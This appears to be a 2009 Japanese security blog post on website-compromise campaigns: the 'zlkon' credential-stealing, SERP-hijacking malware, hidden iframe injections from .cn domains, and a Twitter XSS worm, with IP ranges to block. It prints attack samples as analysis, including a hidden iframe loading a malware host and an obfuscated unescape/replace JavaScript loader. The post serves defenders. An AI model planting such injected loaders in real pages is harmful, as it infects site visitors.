UnderForge of Lack

な～んか zlkonネタばっかりなんですが・・

英国のセキュリティベンダー ScanSafeから、今回のウィルスの解析結果が出されました。

Malware Manipulating Google SERPs
Over the past few months, ScanSafe has been tracking malware that incorporates a couple of crafty Black Hat SEO techniques to manipulate Google SERPs. Because of the nature of how the attacks work, the rate of the attacks have been increasing exponentially and have now grown considerably large.

The attacks are perpetuated through compromise of legitimate sites. Once a visitor to a compromised site has been infected with the trojan, any sites that they manage will then also be susceptible to compromise. (One component of the malware is its ability to monitor traffic and steal FTP credentials). Though stolen FTP credentials appear to be the most common method employed in these particular attacks, compromise can also occur via standard methods, such as poor configuration settings, vulnerable Web apps, and so on.


このへんは、最初にこの事件を伝えた
Black Hat SEO and Rogue Antivirus p.5
のレポートと重複している部分もありますが、

AUX(nn) = xxxx.yyy の形で埋め込まれるウィルスの解析部分が

This causes the malware to load when any sound-enabled application, i.e. any browser, is launched. The malware monitors traffic to and from the browser (and thus enables the malware to steal usernames and passwords and other sensitive information). When infected users perform certain Google searches, the search engine results page (SERP) is manipulated so that affiliate links are replacing the legitimate links. Cookie stuffing is used so that the links presented appear normal, i.e. the affiliate ID is not exposed, but the rogue affiliate gets full credit for the unintended click through.

メールで「日本語でＯＫ！」って怒られた orz

この状態は、音を許可しているすべてのアプリケーション（ほとんどのブラウザー）が起動した際に、マルウェアが読み込まれるように仕組まれます（注釈：音が出ないアプリがあったら教えてほしいものです・苦笑）。このマルウェアはブラウザからのIN/OUTのトラフィックをモニターします（このことはマルウェアがあなたのusername, password その他の機密的な情報を盗めることを意味します）。感染したユーザがGoogle検索を実行した際には、サーチエンジンによる結果(SERP)は改ざんされたものとなり、系列リンクは正当なものとは異なる結果が導き出されます。また Cookie-Stuffingの悪用により、表示されたリンクは正常なように見え、例えばAffiliate-IDなどは表に出てきませんが、邪道なAffiliate(Rogue-Affiliate)は、意図しないクリックにより全額を得ることができるように改ざんされています。

※当然 FTPクライアントも同様です

と、かなり具体的になっています。

Googleの検索結果を勝手に弄って、アフィリエイトリンクを別のもので表示するってのは意外だったなぁ・・気にしないうちにどんどん、不正なアフィリエイトの踏み台にさせられるって、かなり笑えます（苦笑）

-------------------
できれば、シグネーチャで検出名を出してほしかったな・・・

-------------------
IDS/IPS/FW管理者さま：

事大主義的OK! な管理のブロックリスト参考先
Possible 0 day protection, Updated: April 11, 2009

-------------------
To Hさん

私いま出張中でして、よそ様の家でごそごそタイプしてるわけですが・・（泣）

-------------------
そういえば、URLチェッカはどうなった？と聞かれたのですが

Googleは危険サイトに登録しました。
94.247.2.0 の診断ページ
※94.247.2.195でアクセスしても 94.247.2.0のブロックとされますが、94.247.2.0/24（ましてや/23）で弾いているわけではありません。

Symantecもやっと危険サイトに登録しました。
Norton 評価 -- 94.247.2.195

WOT (web of Trust)
WOT - 94.247.2.195
真っ赤っ赤（笑）

McAfee
94.247.2.195 に対する自動安全性検査の結果
不明
をぃ（笑）

Gred -- green or red
type : 94.247.2.195
結果：SAFE
orz...

一連の zlkon virus（仮称）とは別に進行中の IFRAME injection ですが、こちらもカナリ酷い状況になっています。

Malicious “Income” IFrames from .CN Domains
New week, new leader. I mean various hidden iframes from .cn domains injected at the bottom of home pages.

The html code looks like this

＜iframe src="hxxp: //lotmachinesguide .cn/ in.cgi?income56" width=1 height=1 style="visibility: hidden"＞＜/iframe＞

The domain names may vary but they always end with .cn. The domain names usually contain words lot and bet. They all reside on the same server with the IP address 94 .247 .3 .150. The iframes load pages with paths similar to “in.cgi?incomeNN”, where NN is some arbitrary number.

Here is a list of domains used in this malware campaign:

• lotultimatebet .cn
  
• lotmachinesguide .cn
  
• cheapslotplay .cn
  
• lotultimatebet .cn
  
• cutlot .cn
  
• mediahousenameshopfilm .cn
  
• betbigwager .cn
  
• namebuypicture .cn
  
• thelotbet .cn (added: 04.17.2009)
  
• hotslotpot .cn (added: 04.17.2009)
  

94 .247 .3 .150

１行削除 *DELETED*

手口は swfや pdfに誘導してリモートコード実行を狙ったものですが、直接 pdf/swfを指定しているものから、phpでリダイレクトしているものまで、バリエーションがあります。

1月ごろは
Gogo2me - Hidden IFrame Injection.

94 .247 .2 .0

こんな感じだったようですので、あまり変わってないようです。

最近、wormに侵されてからもイロイロあったTwitterですが、更に新種のワームがハビコッテいるようです。

Yet another Twitter worm
A new Twitter cross-site scripting worm is going around on Twitter. Just like the previous Twitter worms it talks about Mikeey.

The malicious script itself is downloaded from 74.200.253.195. Twitter is working on fixing the problem.

This happens on the same day as media reports that Michael Mooney got a job because of him writing the first Twitter worms. So if he did this one too, what was the motivation? To get an even better offer from someone else!? Stupid.

For now, stay away from looking at user's profiles. Also Firefox and NoScript is a good combo.

ま・・アレですね。
最初にTwitterWormを作った犯人（17歳の学生）が、この件で就職できたからって、他のマルウェア作者が仕事にありつけるとは思えないわけですが・・・

Wormのダウンロード先
74.200.253.195
FASTSERVERS-CHI 74.200.192.0/18
これはちょっと範囲デカイかな・・・

どうせ次の攻撃の時は IP変わるでしょうから、単体か、
74.200.253.128/25
で塞いでおいてください。

４行削除

</HEAD>
<script language=javascript><!--
document.write(unescape('%3CGhsm7Acm7ArJVQihWpt%20srm7Ac
%3DQ42%2F%2F9JVQ40AB%2E2hW4hW7Gh%2E2%2E1KY951TT%2F0
ABjJVQqu1TTe0ABr1TTy%2Ej0ABsJVQ%3E%3C%2Fm7AshWcJVQr
Ghipt%3E').replace(/Q42|1TT|m7A|Gh|hW|P8|0AB|KY|JVQ/g,""));
--></script><BODY

やっとおさまったと思ったのになぁ・・

Analysis report for hxxp://afi2000。web。fc2。com/

６行削除

-------------------------
そういえば、so-netの「セキュリティ通信」に今回の件が載っていました

多数サイトが改ざん(1)　PC通販「GENO」など閲覧者にウイルス感染のおそれ

多数サイトが改ざん(2)　狙われた「Adobe Reader」と「Adobe Flash Player」

■ユーザーがとれる対策

　ユーザーがとれる対策としては、Adobe ReaderとFlash Playerを最新版にすること、ウイルス対策ソフトの定義ファイルを更新すること、Javascriptを無効にすること、IPアドレス「94.247.2.0」から「94.247.3.255」までをブロックすることがあげられる。Adobe ReaderとFlash Playerの最新版およびアップデートについての情報は、「関連記事」を参照していただきたい。

実に良い記事ですので、ぜひ広めてほしいです。

zlkon (94.247.2.0-94.247.3.255)のブロックのえびでんす（根拠）は

Bad Actors Part 2 - ZlKon
こことか、
Malware Domain List : 94.247 : DESC
このへんを参考にしてください。